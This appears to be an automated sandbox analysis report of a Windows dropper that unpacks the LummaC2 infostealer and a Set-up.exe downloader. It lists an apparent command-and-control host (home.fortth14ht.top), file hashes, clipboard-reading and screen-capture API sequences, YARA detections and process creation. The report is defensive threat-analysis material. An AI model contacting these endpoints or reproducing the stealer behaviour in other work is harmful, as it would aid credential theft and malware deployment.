Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:52:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe, 00000002.00000003.1948374449.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrm
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1948806966.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1949860672.00000000014B9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000002.00000002.1949334578.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000002.00000003.1948806966.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1949334578.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
Source: Set-up.exe, 00000002.00000002.1949353728.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948374449.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000002.00000002.1949353728.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948374449.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0M
Source: Set-up.exe, 00000002.00000003.1948806966.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948351357.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948193369.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1949334578.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3
Source: Set-up.exe, 00000002.00000002.1949860672.00000000014B9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe, 00000002.00000003.1761273884.0000000000EF7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1761227853.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1761353737.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_009F1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_009F1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_009F1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_009F1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_009F1D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_009F1D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.3stIhG821a.exe.570000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: 3stIhG821a.exe	Static PE information: section name:
Source: 3stIhG821a.exe	Static PE information: section name: .idata
Source: 3stIhG821a.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F5135	1_2_009F5135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C8720	1_2_009C8720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D8095	1_2_009D8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EC894	1_2_009EC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F68A0	1_2_009F68A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FA0D0	1_2_009FA0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F80C5	1_2_009F80C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E20C0	1_2_009E20C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E70F9	1_2_009E70F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E30E0	1_2_009E30E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FB813	1_2_009FB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DA800	1_2_009DA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FA800	1_2_009FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D683F	1_2_009D683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F483C	1_2_009F483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D9820	1_2_009D9820
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DD840	1_2_009DD840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EC984	1_2_009EC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E59B0	1_2_009E59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EC9DA	1_2_009EC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C61D0	1_2_009C61D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FE1F0	1_2_009FE1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EC9E9	1_2_009EC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CB14F	1_2_009CB14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD140	1_2_009FD140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CC97C	1_2_009CC97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C5970	1_2_009C5970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C3960	1_2_009C3960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D1A94	1_2_009D1A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C9290	1_2_009C9290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EC289	1_2_009EC289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CF2A0	1_2_009CF2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DAAE0	1_2_009DAAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D720B	1_2_009D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DC205	1_2_009DC205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DE230	1_2_009DE230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E6230	1_2_009E6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C8A20	1_2_009C8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D4A50	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E7A40	1_2_009E7A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD240	1_2_009FD240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EA3B0	1_2_009EA3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD3B0	1_2_009FD3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FDBB0	1_2_009FDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FCBA6	1_2_009FCBA6
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F6BF0	1_2_009F6BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C4310	1_2_009C4310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F1B10	1_2_009F1B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CAB20	1_2_009CAB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD320	1_2_009FD320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CD35C	1_2_009CD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D7B75	1_2_009D7B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F74F0	1_2_009F74F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D64E0	1_2_009D64E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C4C50	1_2_009C4C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DDC50	1_2_009DDC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD450	1_2_009FD450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E8C46	1_2_009E8C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C7440	1_2_009C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009CE465	1_2_009CE465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E3C60	1_2_009E3C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E7D94	1_2_009E7D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E1D10	1_2_009E1D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FA510	1_2_009FA510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E1550	1_2_009E1550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FE540	1_2_009FE540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DD560	1_2_009DD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FDEB0	1_2_009FDEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F7EA0	1_2_009F7EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E26D3	1_2_009E26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E66C0	1_2_009E66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EFEC0	1_2_009EFEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D9605	1_2_009D9605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D5640	1_2_009D5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009E5640	1_2_009E5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C6660	1_2_009C6660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F7790	1_2_009F7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DDFC0	1_2_009DDFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EDFC3	1_2_009EDFC3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009F5FF0	1_2_009F5FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C9710	1_2_009C9710
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009DF700	1_2_009DF700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009EBF45	1_2_009EBF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009C2F40	1_2_009C2F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009D0F71	1_2_009D0F71
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F48DF1	2_3_00F48DF1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F66563	2_3_00F66563

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\LummaC2.exe C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Set-up.exe 73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 009D4A40 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 009C7FF0 appears 48 times

Source: 3stIhG821a.exe, 00000000.00000002.1778943466.0000000005400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs 3stIhG821a.exe
Source: 3stIhG821a.exe, 00000000.00000002.1770384938.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3stIhG821a.exe
Source: 3stIhG821a.exe, 00000000.00000002.1769319855.0000000000C46000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs 3stIhG821a.exe
Source: 3stIhG821a.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs 3stIhG821a.exe

Source: 3stIhG821a.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.3stIhG821a.exe.570000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: 3stIhG821a.exe

Static PE information: Section: upduborm ZLIB complexity 0.9947887782830523

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_009ED110 CoCreateInstance,

1_2_009ED110

Source: C:\Users\user\Desktop\3stIhG821a.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3stIhG821a.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\3stIhG821a.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 3stIhG821a.exe	ReversingLabs: Detection: 55%
Source: 3stIhG821a.exe	Virustotal: Detection: 46%

Source: 3stIhG821a.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 3stIhG821a.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\3stIhG821a.exe "C:\Users\user\Desktop\3stIhG821a.exe"
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 3stIhG821a.exe

Static file information: File size 6197248 > 1048576

Source: 3stIhG821a.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: 3stIhG821a.exe	Static PE information: Raw size of upduborm is bigger than: 0x100000 < 0x1a6a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\3stIhG821a.exe

